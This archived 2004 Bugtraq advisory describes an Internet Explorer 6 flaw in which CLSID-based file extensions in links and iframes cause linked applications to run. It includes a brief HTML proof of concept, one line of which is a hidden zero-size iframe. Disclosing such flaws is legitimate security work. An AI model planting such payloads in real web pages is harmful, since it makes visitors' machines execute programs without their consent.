lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 20 May 2004 22:52:19 -0000
From: roozbeh afrasiabi <roozbeh_afrasiabi@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Internet explorer .clsid vulnerability





                           advisory#5
/---------------------------------------------------------------------------/


Vendor:              Microsoft Corp.
product:             windows XP
test machine:        winxp.pro.ed IE.6 (Fully Patched)
Discovery by:        Roozbeh Afrasiabi (roozbeh_afrasiabi(at)yahoo(dot)com)
Title:               Internet explorer .clsid vulnerability
local:               yes
/---------------------------------------------------------------------------/









TABLE OF CONTENTS:
==================

Description..............................................1

POC......................................................2

Contact info.............................................3

Disclaimer...............................................4











1)Description
================



CLSIDs are used by windows and other MS  products in  many  different
ways,these CLSIDs are linked to folders,applications,files,...

When CLSIDs that are linked to  executables are used as the extension 
of existing  or  non existing  files  in html pages Internet explorer
would execute the application linked to these CLSIDs , in addition 
existing files with CLSIDs linked to apps would execute too when they
are accessed directly.


2)poc
================


<a href=Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}>dose not exist!</a>

<a href=.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}>dose not exist!</a>

<a href=.{FB7199AB-79BF-11d2-8D94-0000F875C541}>dose not exist!</a>

<iframe id="Target" width="0" height="0" src=".{3E9BAF2D-7A79-11d2-9334-0000F875AE17}" name="Target" scrolling="yes">
</iframe>





3)Contact Info
==================

(roozbeh_afrasiabi(at)yahoo(dot)com)
(da_stone_cold_killer(at)yahoo(dot)com)


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1

mQGiBEBVbGoRBACT+S7j6awJjH8ctpioGfdmQzfwxd/M5vcafFpWjYTb2g4NINfB
gzbXFANzOMDcXhmrQysvgeFl7smhFVKDl0c7dtsqvgn5pydfXRCljZwrSQAwE/PS
vSSzV7QhEI5zLWkpieyjZhlxCYtHlxma36pBx3ZpPPDfAFNpW0QBB94rxwCgoZO9
TR/YXs19bOipfffI02dv758EAILHfEHXNkb050yaU8y47JJXl64OOnQcwgNafLa4
cEyYSRYwkZUqnBX6xmB/hy8J9AnmED7tjKLSqrupJivrxueSwbNom+QN2cPpWv+i
MZXGgMLZAOrlAi4R7gGBAIq7K+Ow0Z4/FQMH3Aryw9WkBlDK7bChfLeoAXNrQAWG
kfgKA/47WQN0SAD9KSmbdMB6q8EE7sD7vYkZWIg+j4JJaWskdN7qCbSB6EBnWKQb
6gE2999nlphhmcUjS1TgjUgCLHjQ9lMIWr0Zec8NmcZyEVnEKgjHK7MkvocLpT7h
zYkVMO9HLecllYr6FrnNtWpOw/X7FVhSkNIKgNNZQ0Z3Xi3Z57RQcm9vemJlaCBh
ZnJhc2lhYmkgKHJvb3piZWhfYWZyYXNpYWJpQHlhaG9vLmNvbSkgPGRhX3N0b25l
X2NvbGRfa2lsbGVyQHlhaG9vLmNvbT6IWQQTEQIAGQUCQFVsagQLBwMCAxUCAwMW
AgECHgECF4AACgkQLh+KhhfWhDXgTwCeKAVoNkUjYqBbWu+l3WfArf4+vwkAoIjx
rBC/FnLEJDuSJ5SuLho04QtOuOsEQFVscwEHAL5OyxFo1eAwGijoPfIwQPINLuvr
bo7WVzwGmUXvvZsbLvMjc80zdUD2PaZr1kurZwqE13If+XzpNZdlFfmjtYKST+s8
8lwnzK2ososE0m4uT1MatHQxK3HNKIDRUOg7TC8PaPD+FUYntcdUYs3bdror7179
kOIfM7/ZtCQuWoqFMOZiCTd7PUSgmEXsUWoNzlNmGJmZMgSc0MtAFiGDys3sA5fK
8JyOA0rQHvmcne1Xh9P4aA9+mutSGnx/4mFPYLdDFBA5go5B0XOPrjQelxQlRAAU
xmWk0kgx+X25WRK/AAYpiEYEGBECAAYFAkBVbHMACgkQLh+KhhfWhDUH4wCfZ/83
xkEvaT1IWeaDemU5dYAysPsAnRP6Qyw1DM3gHhxl6m+bjEwPX6AG
=q+hK
-----END PGP PUBLIC KEY BLOCK-----


4)Disclaimer
==================


Roozbeh Afrasiabi is not responsible for the misuse of the information provided in this report. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use ofthe information is at the user's own risk.


                                                     All Rights Reserved






  


Powered by blists - more mailing lists